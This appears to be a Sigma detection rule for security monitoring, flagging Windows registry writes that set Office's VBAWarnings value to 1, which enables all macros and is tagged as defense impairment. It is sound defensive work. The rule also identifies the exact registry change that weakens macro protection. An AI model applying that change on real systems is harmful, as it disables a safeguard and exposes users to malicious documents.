author: Trent Liffick (@tliffick), Nasreddine Bencherchali (Nextron Systems)
date: 2020-05-22
modified: 2024-03-19
tags:
    - attack.persistence
    - attack.defense-impairment
    - attack.t1112
logsource:
    category: registry_set
    product: windows
detection:
    selection:
        TargetObject|endswith: '\Security\VBAWarnings'
        Details: 'DWORD (0x00000001)'
    condition: selection
falsepositives:
    - Unlikely
level: high
Convert to SIEM query
Showing 801-850 of 3,646